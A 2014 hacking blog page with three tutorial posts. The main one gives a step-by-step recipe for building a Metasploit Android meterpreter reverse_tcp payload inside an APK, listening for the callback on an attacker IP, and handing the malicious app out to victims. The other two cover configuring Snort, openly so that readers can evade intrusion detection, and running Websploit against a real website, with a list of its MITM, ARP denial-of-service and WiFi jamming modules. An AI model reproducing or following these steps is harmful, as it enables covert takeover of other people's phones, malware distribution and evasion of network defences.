Monday, 19 May 2014

Hacking Android Smartphone Tutorial ( Easy Way )

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
What is android? according to wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use HTC One android 4.4 KitKat)


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

Hacking Android Smartphone Tutorial using Metasploit

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Hacking Android Smartphone Tutorial using Metasploit

Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Hacking Android Smartphone Tutorial using Metasploit

Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution :-) ).

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

Hacking Android Smartphone Tutorial using Metasploit

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

Hacking Android Smartphone Tutorial using Metasploit

Thursday, 15 May 2014

Evade A Network Intrusion Detection System (NIDS) Using Snort.

Welcome back, my fledgling hackers!

Nearly every commercial enterprise worth hacking has an intrusion detection system (IDS). These network intrusion detection systems are designed to detect any malicious activity on the network. That means you!
As the name implies, a network intrusion detection system (NIDS) is intended to alert the system administrator of network-based intrusions. As a hacker, the better we understand how these NIDS work, the better we can evade them and stealthily enter and exit a network without detection. In an attempt to train you to evade these systems, I am beginning new series on how NIDS work.


Introducing Snort: Our NIDS of Choice

Snort is an open-source NIDS that is the most widely used NIDS in the world. Some estimate its market share at over 60%. It's used by such large organizations as Verizon, AT&T, the U.S. State Department, most U.S. military bases, and millions of medium to large businesses around the globe. Last month (July 2013), Cisco announced that they would be acquiring the parent company of Snort, Sourcefire Inc. of Columbia, MD. This insures that Snort will remain the dominant NIDS on the planet for some time to come, making it increasingly important that we understand Snort—so we can evade it.
Fortunately, Snort is built into our BackTrack, so we don't need to install it. If you do need to download it, you can find it here.

Step 1: Fire Up Snort

Snort is basically a network traffic sniffer that can apply rules to the traffic it sees to determine whether it contains malicious traffic. We can start Snort in sniffer mode by opening any terminal in BackTrack and typing:
  • snort -vde
After we hit enter, we begin to see packets going past the screen in rapid succession. Snort is simply sniffing packets from the wire and displaying them to us.
To stop Snort, hit the Control C. When we stop Snort, it displays our statistics on the packet capture.

Step 2: Intrusion Detection Mode

To get Snort to operate in Intrusion Detection (IDS) mode, we need to get Snort to use its configuration file. Nearly all applications in Linux are controlled by a configuration file that is a simple text file. This same applies to Snort. Snort's configuration file is named snort.conf and is usually found at /etc/snort/snort.conf. So, to get Snort to use its configuration file, we need to start it with:
  • snort -vde -c /etc/snort/snort.conf
Where -c says use the configuration file, and /etc/snort/snort.conf is the location of the configuration file.
When Snort starts in IDS mode, we begin to see a screen similar to that below. Eventually, the screen will stop scrolling and Snort will begin to watch your network traffic.
Now Snort is sniffing our wire and will alert when something malicious appears!

Step 3: Configuring Snort

Snort comes with a default configuration file that, for the most part, will work with little editing. The configuration has plenty of comments to explain what each line and section does, so you can figure it out with little outside assistance.
Their are at least 3 areas, though, that need some attention and configuring...
  1. The EXTERNAL_NET variable
  2. The HOME_NET variable
  3. The path to the Snort rules
Without the Snort rules, Snort is just a sniffer/packet logger, far from the powerful IDS it can be. That being said, let's get inside that Snort configuration file and make the minimum changes to get Snort to run as an effective IDS.
Let's open the snort configuration file with KWrite.
  • kwrite /etc/snort/snort.conf
As you can see in the screenshot above, the configuration file is comprised of six (6) sections.
  1. Set the variables on your network
  2. Configure dynamic loaded libraries
  3. Configure preprocessors
  4. Configure output plugins
  5. Add any runtime config directives
  6. Customize your rule set
We need to first set the variables for our internal and external network. These are defined by the lines:
  • var HOME_NET
  • var EXTERNAL_NET
We can define our HOME_NET as the IP address or subnet we're trying to protect. You see in the screenshot that it's set as "any." This will work, but it's not optimal for detecting malicious activity. We should set the HOME_NET to our internal IP address, such as 192.168.1.1, or our internal subnet, such as 192.168.1.0/24.
In most cases, security admins will define their EXTERNAL_NET as everything that is NOT their HOME_NET. To accomplish this, we can simply negate (!) the HOME_NET or ! HOME_NET.
Next, we need to set our path to our rules. As we can see in the screenshot below, about two-thirds of the way down, there is:
  • var RULE_PATH /etc/snort/rules
In most installations, this path will be correct (but does vary with different installations) and we can simply leave it as is, but make certain that your rules are in this path before assuming so. When you are done, simply save the snort.conf file.

Step 4: Checking the Snort Rules

We can navigate to the rules directory by typing these two commands:
  • cd /etc/snort/rules
  • ls -l
In this way, we can see all of the files that comprise our Snort rules. It's these Snort rules that are designed to catch intrusions and alert the security admin.
In my next tutorial in this series, we will examine these rules and how they work to catch intrusions. The better we understand these Snort rules, the better we able to evade them!

Saturday, 3 May 2014

WEBSPLOIT TUTORIAL MITM ATTACK ::: KALI LINUX



Websploit is an automatic vulnerability assessment, web crawler and exploiter tool. It is an open source command line utility that composed on modular structure. At the time of writing, there are 16 modules are available on Websploit, it can be downloaded from sourceforge project website but it is available on Kali Linux by default.





Websploit can be synchronize with Metasploit WMAP project for web vulnerability scanning, there are four categories of modular are available and they are:


  • Web Modules
  • Network Modules
  • Exploit Modules
  • Wireless Modules


In Wireless module we can run some interesting WiFi attacking vector including the WiFi jammer and WiFi DDOS attack. For exploitation, websploit is working on the basis of Metasploit Autopwn service and metasploit browser autopwn service. A large number of interesting attacking vectors are available on the network modules, and they are but not limited to:


  • ARP cache DOS attack
  • Middle Finger Of Doom Attack
  • Man In The Middle Attack
  • Man Left In The Middle Attack
  • Fake Update Attack Using DNS Spoof
  • And more....


Some modules of websploit are depends on Metasploit for example


  • Information Gathering From Victim Web Using (Metasploit Wmap)


So it is recommended to configure Metasploit before using these modules, the demonstration of every modules are not possible on this single article, but the basic command and usage of the software mentioned below and it surely help you to use websploit in a professional manner.



If you are on Kali Linux, then click on Applications → Kali Linux → Web Applications → Web Vulnerability Scanners → Websploit







The list of commands that can applicable on websploit are:



Commands                   Description

---------------                  ----------------

set                              Set Value Of Options To Modules

scan                            Scan Wifi (Wireless Modules)

stop                            Stop Attack & Scan (Wireless Modules)

run                             Execute Module

use                             Select Module For Use

os                               Run Linux Commands(ex : os ifconfig)

back                           Exit Current Module

show modules            Show Modules of Current Database

show options              Show Current Options Of Selected Module

upgrade                     Get New Version

update                        Update Websploit Framework



In the demonstration mentioned below: the web directory scanner attack will be performed.





wsf > show modules



..

..

wsf > use web/dir_scanner

wsf:Dir_Scanner > show options


Options Value

--------- --------------

TARGET http://google.com


wsf:Dir_Scanner > set TARGET http://ehacking.net

TARGET => ehacking.net

wsf:Dir_Scanner > run

[*] Your Target : ehacking.net

[*]Loading Path List ... Please Wait ...

[index] ... [404 Not Found]

[images] ... [404 Not Found]

[download] ... [404 Not Found]

..

..

..


The commands to perform other attacking vector are same, just follow the steps mentioned above.